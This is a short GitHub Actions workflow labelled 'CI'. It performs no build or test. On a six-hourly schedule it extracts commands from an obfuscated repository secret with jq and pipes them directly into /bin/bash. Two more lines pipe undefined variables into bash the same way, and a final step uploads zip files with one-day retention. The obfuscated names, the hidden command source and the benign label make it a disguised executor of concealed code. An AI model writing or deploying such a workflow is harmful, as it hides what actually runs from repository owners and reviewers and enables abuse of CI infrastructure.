name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '58 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          bq334: ${{ secrets.bq334 }}
        run: |
          printf '%s' "$bq334" | jq -r .qhdg21 | /bin/bash
          echo $guz62812 | jq -r .nr95360 | /bin/bash
          echo $rnuwg07 | jq -r .dgngk6 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: p0WJJbc0
          path: "*.zip"
          retention-days: 1
